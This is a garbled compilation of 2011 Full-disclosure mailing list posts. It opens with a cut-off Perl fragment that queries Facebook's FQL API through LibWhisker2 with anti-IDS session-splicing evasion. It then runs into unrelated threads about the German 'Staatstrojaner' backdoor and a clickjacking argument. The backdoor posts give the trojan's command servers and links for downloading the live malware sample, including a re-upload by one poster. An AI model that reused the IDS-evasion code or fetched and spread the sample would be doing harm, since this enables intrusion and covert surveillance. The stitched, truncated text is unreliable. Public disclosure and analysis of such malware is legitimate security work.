>     if (%{$ref->{$parent}}) {
>         print "$parent: \n";
>         foreach my $key (sort keys %{$ref->{$parent}}) {
>             if (%{$ref->{$parent}->{$key}}) {
>                 print "\t$key : \n";
>                 foreach my $mojo (sort keys %{$ref->{$parent}->{$key}}) {
>                     print "\t\t$mojo : ";
>                     print $ref->{$parent}->{$key}->{$mojo};
>                     print "\n";
>                 }
>             } else {
>                 print "\t$key : ";
>                 print $ref->{$parent}->{$key};
>                 print "\n";
>             }
>         }
>     } else {
>         print "$parent : " . $ref->{$parent} . "\n";
>     }
> }
>
> sub fqlQuery {
>     my $q = shift;
>     $q =~ s/ /%20/g;
>     my $link = "http://api.facebook.com/method/fql.query?query=$q";
>     my $text = download($link, "api.facebook.com");
>     my $ref  = XMLin($text);
>     return($ref);
> }
>
> # Fetch $uri through LibWhisker2 with anti-IDS encoding mode 9 (session splicing).
> sub download {
>     my $uri  = shift;
>     my $try  = 5;
>     my $host = shift;
>     my %request;
>     my %response;
>     LW2::http_init_request(\%request);
>     $request{'whisker'}->{'method'}          = "GET";
>     $request{'whisker'}->{'host'}            = $host;
>     $request{'whisker'}->{'uri'}             = $uri;
>     $request{'whisker'}->{'encode_anti_ids'} = 9;
>     $request{'whisker'}->{'user-agent'}      = "";
>     LW2::http_fixup_request(\%request);
>     if (LW2::http_do_request(\%request, \%response)) {
>         if ($try < 5) {
>             print "Failed to fetch $uri on try $try. Retrying...\n";
>             return undef if (!download($uri, $try++));
>         }
>         print "Failed to fetch $uri.\n";
>         return undef;
>     } else {
>         return
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
> Hi List,
>
> I thought this could be interesting. My English is not very good so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html):
>
> Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government. The announcement was made public on ccc.de (http://www.ccc.de/) with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF (http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf) (in German).
>
> The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include *Firefox, Skype, MSN Messenger, ICQ* and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 and 207.158.22.134
>
> According to CCC Germany the backdoor could also be exploited by third parties.
>
> You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz . You'll need gzip and tar to get the .dll and the .sys file.

Based on what do they think the German government is behind this trojan?

From F-Secure:
> We have never before analysed a sample that has been suspected to be a governmental backdoor. We have also never been asked by any government to avoid detecting their backdoors.

Isn't it obvious? Which government wants to say 'Hi, we do this shit too ...'?
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41 said:
> Interesting... although that archive seems corrupt... I'd like to see a bit more about this but, very interesting indeed.. specially Skype ID harvesting, what could this be for.

I hope that was a sarcastic "Now what could this *possibly* be for?" :)
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
> No,... and am happy not to know :-), like XSS. I do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS.

It's all total BS till you discover you're a victim of the attack.
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
Ta, I'll take a look.. very interesting, I'd love to see src code ;p That would be in whose hands,... I wonder..hehe.. maybe gov or just a very very smart hax0r...

On 10 October 2011 10:21, You Got Pwned yougotpwn...@googlemail.com wrote:
> gunzip the archive then use tar. I also made a zip file which contains the extracted .dll and the .sys file and uploaded it here: http://www.2shared.com/file/QWyk-yCp/bundestrojaner.html
>
> 2011/10/10 xD 0x41 sec...@gmail.com
>> Interesting... although that archive seems corrupt... I'd like to see a bit more about this but, very interesting indeed.. specially Skype ID harvesting, what could this be for. hrms
>> xD
>>
>> On 10 October 2011 07:13, ja...@smithwaysecurity.com wrote:
>>> On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote:
>>>> Hi List,
>>>>
>>>> I thought this could be interesting. My English is not very good so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html [1]):
>>>>
>>>> Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government. The announcement was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German).
>>>>
>>>> The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134
>>>>
>>>> According to CCC Germany the backdoor could also be exploited by third parties.
>>>>
>>>> You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5]. You'll need gzip and tar to get the .dll and the .sys file.
>>>>
>>>> Links:
>>>> --
>>>> [1] http://www.f-secure.com/weblog/archives/2249.html
>>>> [2] http://www.ccc.de/
>>>> [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>>>> [4] http://webmail.0m3ga.net/tel:83.236.140.90
>>>> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>>>
>>> I was looking at this just late last night.
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
No, I have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) I'm too old for that. Never been a victim yet, in *any* way, and, certainly, those bugs won't be starting a trend..
cheer.
xD

On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote:
> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>> No,... and am happy not to know :-), like XSS. I do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS.
>
> It's all total BS till you discover you're a victim of the attack.
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right secn3t?
http://seclists.org/fulldisclosure/2011/Jun/215

On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 sec...@gmail.com wrote:
> No, I have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) I'm too old for that. Never been a victim yet, in *any* way, and, certainly, those bugs won't be starting a trend..
> cheer.
> xD
>
> On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote:
>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>>> No,... and am happy not to know :-), like XSS. I do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS.
>>
>> It's all total BS till you discover you're a victim of the attack.
Re: [Full-disclosure] LinkedIn_User Account Delete using Click jacking
YEP! When ya do it right, dang right it is! I did never reproduce the EXACT method which made the x41's happen... but, I dun really care for that bug, or you call it a feature..well, I don't know features which have x41's all over the emails when made in a special way... so, it was low-level too :) Anyhow, no, I won't bother to recreate the email body, without using any 'features' of Google's, for you. It is possible to exploit the rich text editor, I have said.. the dll itself.. so maybe go investigate and stfu :) Now back to the backdoor.

On 10 October 2011 11:23, adam a...@papsy.net wrote:
> Yeah guys, XSS is nonsense. Exploiting anchor text is where it's at, right secn3t?
> http://seclists.org/fulldisclosure/2011/Jun/215
>
> On Sun, Oct 9, 2011 at 7:10 PM, xD 0x41 sec...@gmail.com wrote:
>> No, I have been through these, and only an idiot would fall for any of these attacks... Persistent XSS maybe harder, but, forget the rest :) I'm too old for that. Never been a victim yet, in *any* way, and, certainly, those bugs won't be starting a trend..
>> cheer.
>> xD
>>
>> On 10 October 2011 10:27, valdis.kletni...@vt.edu wrote:
>>> On Mon, 10 Oct 2011 09:36:17 +1100, xD 0x41 said:
>>>> No,... and am happy not to know :-), like XSS. I do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS.
>>>
>>> It's all total BS till you discover you're a victim of the attack.
Re: [Full-disclosure] Possible German Governmental Backdoor found (R2D2)
It has some valid uses for sure. Well, the Skype ID harvesting and sound recording can be used for counter-intelligence and counter-terrorism operations. But that's just theory.

On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41 sec...@gmail.com wrote:
> Interesting... although that archive seems corrupt... I'd like to see a bit more about this but, very interesting indeed.. specially Skype ID harvesting, what could this be for. hrms
> xD
>
> On 10 October 2011 07:13, ja...@smithwaysecurity.com wrote:
>> On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned yougotpwn...@googlemail.com wrote:
>>> Hi List,
>>>
>>> I thought this could be interesting. My English is not very good so I copied the following information from F-Secure (http://www.f-secure.com/weblog/archives/2249.html [1]):
>>>
>>> Chaos Computer Club from Germany has tonight announced that they have located a backdoor trojan used by the German Government. The announcement was made public on ccc.de [2] with a detailed 20-page analysis of the functionality of the malware. Download the report in PDF [3] (in German).
>>>
>>> The malware in question is a Windows backdoor consisting of a DLL and a kernel driver. The backdoor includes a keylogger that targets certain applications. These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and others. The backdoor also contains code intended to take screenshots and record audio, including recording Skype calls. In addition, the backdoor can be remotely updated. Servers that it connects to include 83.236.140.90 [4] and 207.158.22.134
>>>
>>> According to CCC Germany the backdoor could also be exploited by third parties.
>>>
>>> You can download it from http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz [5]. You'll need gzip and tar to get the .dll and the .sys file.
>>>
>>> Links:
>>> --
>>> [1] http://www.f-secure.com/weblog/archives/2249.html
>>> [2] http://www.ccc.de/
>>> [3] http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>>> [4] http://webmail.0m3ga.net/tel:83.236.140.90
>>> [5] http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>>
>> I was looking at this just late last night.